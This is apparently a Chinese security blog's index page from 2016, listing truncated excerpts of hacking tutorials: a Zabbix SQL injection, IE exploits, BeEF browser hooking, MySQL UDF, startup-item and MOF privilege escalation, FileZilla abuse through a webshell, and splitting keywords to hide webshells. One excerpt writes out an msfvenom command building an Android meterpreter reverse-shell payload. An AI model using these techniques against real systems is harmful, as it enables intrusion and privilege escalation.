8年前 (2016-08-18) 4609浏览 0评论

漏洞概述 zabbix是一个开源的企业级性能监控解决方案。近日，zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞，攻击者无需授权登陆即可登陆zabbix管理系统，也可通过script等功能轻易直接获取zab...

8年前 (2016-08-18) 6192浏览 0评论

上篇文章我们利用了 ms10-002 的这个 Exploit ，但目前来说它的利用率已经非常低了。因为它的 target 为IE6.0及以下的版本，只要用户按常规升级补丁，基本就很难利用到！今天，继续为大家介绍另一个IE的Exploit 。该EXP可...

8年前 (2016-08-17) 11618浏览 2评论

00×01 首先，我们来到beef安装目录下，启动 ./beef 。这里就不做过多讲解了！成功启动后，我们可以在启动界面找到 UI 的登录地址及 hook.js 的文件地址。如下： Hook URL: http://192.168.80.1...

8年前 (2016-08-16) 12648浏览 0评论

话不多说，我们直接切入正题。 1.首先我们打开Kali的命令终端，输入如下命令: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/roo...

8年前 (2016-08-15) 12199浏览 0评论

关于UDF提权，也是现在比较常见的MySQL类提权方式之一。它的提权原理也非常简单！即是利用了root 高权限，创建带有调用cmd的函数的udf.dll动态链接库！这样一来我们就可以利用 system权限进行提权操作了！ 在开始进行UDF提权前，我们...

8年前 (2016-08-14) 4862浏览 0评论

关于MySQL的启动项提权，听其名知其意。就是将一段 VBS脚本导入到 ?C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下，如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权...

8年前 (2016-08-13) 9148浏览 1评论

关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mo...

8年前 (2016-08-12) 8951浏览 0评论

话不多说，我们直接操作！ 首先我们通过 webshell 找到 FileZilla 的文件目录，找到 FileZilla Server Interface.xml 文件，打开。我们可以看到它的连接地址：127.0.0.1 及端口：14147，密码这里...

8年前 (2016-08-11) 6052浏览 0评论

1.关键字拆分。 ? ?? ?? ?比如assert，可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 ??? ??...

8年前 (2016-08-11) 6785浏览 1评论

之所以要在raspbian系统上结合Kali功能，是因为经本人测试直接在小派上安装Kali，部分功能无法正常使用。 例如无线破解无法检测到网卡驱动。其次，对于一般人而言，下载安装一个kali不仅没必要，还显得过于臃肿。话不多说，下面让我们一起来动手操...